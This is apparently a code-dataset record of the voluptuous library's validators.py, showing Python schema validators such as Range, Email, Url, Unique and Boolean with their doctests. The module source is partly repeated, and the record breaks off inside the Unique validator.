        """Return *v* if it parses with the configured strptime format."""
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg
                or 'value does not match expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""

    # strptime format used when none is supplied.
    DEFAULT_FORMAT = '%Y-%m-%d'

    def __call__(self, v):
        """Return *v* if it parses with the configured date format."""
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg
                or 'value does not match expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it is a member of the container."""
        try:
            allowed = v in self.container
        except TypeError:
            # Unhashable / incomparable values count as "not allowed".
            allowed = False
        if not allowed:
            raise InInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it is absent from the container."""
        try:
            forbidden = v in self.container
        except TypeError:
            # Unhashable values cannot be proven absent, so reject them.
            forbidden = True
        if forbidden:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.

    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...   s([3, 2])
    """

    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it contains the configured item."""
        try:
            present = self.item in v
        except TypeError:
            # Values that do not support membership tests are rejected.
            present = False
        if not present:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.

    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """

    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Pre-compile one Schema per positional validator.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        """Validate *v* element-wise, preserving its sequence type."""
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            validated = (schema(x) for x, schema in zip(v, self._schemas))
            v = type(v)(validated)
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        return v

    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.

    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).

    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.

    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...   s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...   s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...   s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...   s('aabbc')
    """

    def __init__(self, msg=None):
        self.msg = msg

    def __call__(self, v):
        """Return *v* if all of its elements are distinct."""
        try:
            distinct = set(v)
        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        if len(distinct) != len(v):
            # Collect the elements that occur more than once for the message.
            counts = {}
            for item in v:
                counts[item] = counts.get(item, 0) + 1
            dupes = list(set(item for item, n in counts.items() if n > 1))
            raise Invalid(
                self.msg or 'contains duplicate items: {0}'.format(dupes))
        return v

    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.

    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...    s(2)

    Validators are not supported, match must be exact:

    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """

    def __init__(self, target, msg=None):
        self.target = target
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it compares equal to the target."""
        if v != self.target:
            message = self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target)
            raise Invalid(message)
        return v

    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.

    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """

    def __init__(self, validators, msg=None, **kwargs):
        self.validators = validators
        self.msg = msg
        # Pre-compile one Schema per validator.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy matching: each element consumes the first still-unused
        # schema that accepts it.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v

    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale).

    :raises Invalid: If the value does not match the provided Precision and Scale.

    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """

    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        self.precision = precision
        self.scale = scale
        self.msg = msg
        self.yield_decimal = yield_decimal

    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)
        # When both constraints are configured and both are violated,
        # report the combined message; otherwise report individually.
        both_set = self.precision is not None and self.scale is not None
        if both_set and precision != self.precision and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        if self.precision is not None and precision != self.precision:
            raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
        if self.scale is not None and scale != self.scale:
            raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
        return decimal_num if self.yield_decimal else v

    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))

    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        digits_exp = decimal_num.as_tuple()
        return (len(digits_exp.digits), -digits_exp.exponent, decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.

    The output of each validator is passed as input to the next.

    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met

    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...   validate(6.2)
    """

    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Unset bounds default to "no lower bound" / "all validators".
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)

    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        # Count how many sub-validators accepted the value.
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v

        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))

        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)

    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Boolean | python | def Boolean(v):
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v) | Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid) | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L154-L181 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
# Matches the local part (before the '@') of an email address.
USER_REGEX = re.compile(
    # dot-atom
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
    # quoted-string
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r"""\\[\001-\011\013\014\016-\177])*"$)""",
    re.IGNORECASE
)
# Matches the domain part (after the '@'): a dotted hostname or a
# bracketed IPv4 address literal (SMTP 4.1.3).
DOMAIN_REGEX = re.compile(
    # domain
    r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
    r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
    # literal form, ipv4 address (SMTP 4.1.3)
    r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
    """Convenience decorator to convert truth functions into validators.

    >>> @truth
    ... def isdir(v):
    ...   return os.path.isdir(v)
    >>> validate = Schema(isdir)
    >>> validate('/')
    '/'
    >>> with raises(MultipleInvalid, 'not a valid value'):
    ...   validate('/notavaliddir')
    """
    @wraps(f)
    def check(v):
        # A falsy result signals failure; ValueError is what the
        # surrounding machinery (e.g. @message) turns into Invalid.
        if not f(v):
            raise ValueError
        return v
    return check
class Coerce(object):
    """Coerce a value to a type.

    If the type constructor throws a ValueError or TypeError, the value
    will be marked as Invalid.

    Default behavior:

    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...   validate(None)
    >>> with raises(MultipleInvalid, 'expected int'):
    ...   validate('foo')

    With custom message:

    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...   validate('foo')
    """

    def __init__(self, type, msg=None):
        self.type = type
        self.msg = msg
        # Cached for the error message and __repr__.
        self.type_name = type.__name__

    def __call__(self, v):
        """Return ``type(v)``, or raise CoerceInvalid on conversion failure."""
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            raise CoerceInvalid(self.msg or 'expected %s' % self.type_name)

    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.

    >>> validate = Schema(IsTrue())

    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":

    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate(False)

    ...and so on.

    >>> try:
    ...  validate([])
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], TrueInvalid)
    """
    # The @truth decorator raises ValueError when v is falsy; @message
    # converts that into TrueInvalid('value was not true').
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.

    (see :func:`IsTrue` for more detail)

    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...   validate(True)

    >>> try:
    ...  validate(True)
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], FalseInvalid)
    """
    # Any truthy value fails; @message converts the ValueError into
    # FalseInvalid('value was not false').
    if v:
        raise ValueError
    return v
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.

    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.
    """
    # NOTE: a stray ``@message('expected boolean', cls=BooleanInvalid)``
    # decorator (left over from a removed Boolean() function) previously
    # preceded this class; applying it would have wrapped the class in a
    # function and broken every subclass, so it has been removed.

    def __init__(self, *validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)

    def __voluptuous_compile__(self, schema):
        # Compile each sub-validator with the parent schema so path
        # information and `required` propagate correctly.
        self._compiled = []
        for v in self.validators:
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run

    def _run(self, path, value):
        return self._exec(self._compiled, value, path)

    def __call__(self, v):
        # Fallback for direct calls (outside a compiled Schema): wrap each
        # sub-validator in its own Schema on the fly.
        return self._exec((Schema(val) for val in self.validators), v)

    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.

    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...   validate('moo')

    msg argument is used

    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...   validate(4)
    """

    def _exec(self, funcs, v, path=None):
        # Try each sub-validator in turn; the first success wins.
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Remember the "deepest" failure (longest error path),
                # which is usually the most informative one to report.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)


# Convenience alias
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.

    The output of each validator is passed as input to the next.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """

    def _exec(self, funcs, v, path=None):
        try:
            # Thread the value through every validator in order.
            for func in funcs:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
        except Invalid as e:
            raise e if self.msg is None else AllInvalid(self.msg, path=path)
        return v


# Convenience alias
And = All
class Match(object):
    """Value must be a string that matches the regular expression.

    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...   validate('123EF4')

    >>> with raises(MultipleInvalid, 'expected string or buffer'):
    ...   validate(123)

    Pattern may also be a _compiled regular expression:

    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """

    def __init__(self, pattern, msg=None):
        # Accept either a pattern string or a pre-compiled pattern object.
        if isinstance(pattern, basestring):
            self.pattern = re.compile(pattern)
        else:
            self.pattern = pattern
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it matches the pattern at its start."""
        try:
            matched = self.pattern.match(v)
        except TypeError:
            raise MatchInvalid("expected string or buffer")
        if matched:
            return v
        raise MatchInvalid(self.msg or 'does not match regular expression')

    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.

    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """

    def __init__(self, pattern, substitution, msg=None):
        # Accept either a pattern string or a pre-compiled pattern object.
        if isinstance(pattern, basestring):
            self.pattern = re.compile(pattern)
        else:
            self.pattern = pattern
        self.substitution = substitution
        self.msg = msg

    def __call__(self, v):
        """Return *v* with every pattern occurrence substituted."""
        return self.pattern.sub(self.substitution, v)

    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
                                            self.substitution,
                                            self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.

    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    try:
        if not v or "@" not in v:
            raise EmailInvalid("Invalid Email")
        user_part, domain_part = v.rsplit('@', 1)
        if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
            raise EmailInvalid("Invalid Email")
        return v
    except Exception:
        # Normalize any failure to ValueError so the @message decorator
        # reports 'expected an Email'.  ``except Exception`` (not a bare
        # ``except:``) keeps SystemExit/KeyboardInterrupt propagating.
        raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.

    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...   s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        parsed_url = _url_validation(v)
        # A fully qualified URL must carry a dotted domain name,
        # not a bare host such as "localhost".
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except Exception:
        # Normalize every failure to ValueError so the @message decorator
        # reports the generic error above.  Catch Exception rather than
        # using a bare ``except:`` so SystemExit/KeyboardInterrupt still
        # propagate.
        raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.

    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...   s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except Exception:
        # Catch Exception (not a bare ``except:``) so SystemExit and
        # KeyboardInterrupt still propagate; ValueError triggers the
        # @message decorator's generic error.
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.

    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...   IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...   IsFile()(None)
    """
    try:
        # Falsy values (None, '') can never name an existing file.
        if not v:
            raise FileInvalid('Not a file')
        return os.path.isfile(str(v))
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.

    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...   IsDir()(None)
    """
    try:
        # Falsy values (None, '') can never name an existing directory.
        if not v:
            raise DirInvalid("Not a directory")
        return os.path.isdir(str(v))
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.

    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...   PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...   PathExists()(None)
    """
    try:
        # Falsy values (None, '') can never name an existing path.
        if not v:
            raise PathInvalid("Not a Path")
        return os.path.exists(str(v))
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.

    :raises Invalid: if the value does not match the given validator and is
        not None

    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...  s("string")
    """
    # Equivalent to Any(None, validator): None passes immediately,
    # everything else is delegated to the wrapped validator.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.

    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.

    :raises Invalid: If the value is outside the range.

    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...   s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...   s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...   Schema(Range(max=10, max_included=False))(20)
    """

    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg

    def __call__(self, v):
        """Return *v* unchanged if it lies within the configured range."""
        # The negated comparisons (``not v >= ...``) are deliberate: they
        # reject values such as NaN that compare false both ways.
        if self.min is not None:
            if self.min_included:
                if not v >= self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % self.min)
            elif not v > self.min:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % self.min)
        if self.max is not None:
            if self.max_included:
                if not v <= self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % self.max)
            elif not v < self.max:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % self.max)
        return v

    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.

    Either min or max may be omitted.

    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        """Return *v* pulled back inside the configured bounds."""
        if self.min is not None:
            v = max(v, self.min)
        if self.max is not None:
            v = min(v, self.max)
        return v

    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        """Return *v* if ``len(v)`` falls within [min, max]."""
        # len() is only evaluated when a bound is configured, so values
        # without a length still pass an unbounded Length().
        too_short = self.min is not None and len(v) < self.min
        if too_short:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        too_long = self.max is not None and len(v) > self.max
        if too_long:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v

    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""

    # strptime format used when none is supplied.
    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'

    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it parses with the configured strptime format."""
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DatetimeInvalid(
                self.msg
                or 'value does not match expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""

    # strptime format used when none is supplied.
    DEFAULT_FORMAT = '%Y-%m-%d'

    def __call__(self, v):
        """Return *v* if it parses with the configured date format."""
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            raise DateInvalid(
                self.msg
                or 'value does not match expected format %s' % self.format)
        return v

    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it is a member of the container."""
        try:
            allowed = v in self.container
        except TypeError:
            # Unhashable / incomparable values count as "not allowed".
            allowed = False
        if not allowed:
            raise InInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""

    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it is absent from the container."""
        try:
            forbidden = v in self.container
        except TypeError:
            # Unhashable values cannot be proven absent, so reject them.
            forbidden = True
        if forbidden:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.

    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...   s([3, 2])
    """

    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it contains the configured item."""
        try:
            present = self.item in v
        except TypeError:
            # Values that do not support membership tests are rejected.
            present = False
        if not present:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v

    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.

    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """

    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Pre-compile one Schema per positional validator.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        """Validate *v* element-wise, preserving its sequence type."""
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            validated = (schema(x) for x, schema in zip(v, self._schemas))
            v = type(v)(validated)
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        return v

    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.

    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).

    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.

    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...   s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...   s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...   s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...   s('aabbc')
    """

    def __init__(self, msg=None):
        self.msg = msg

    def __call__(self, v):
        """Return *v* if all of its elements are distinct."""
        try:
            distinct = set(v)
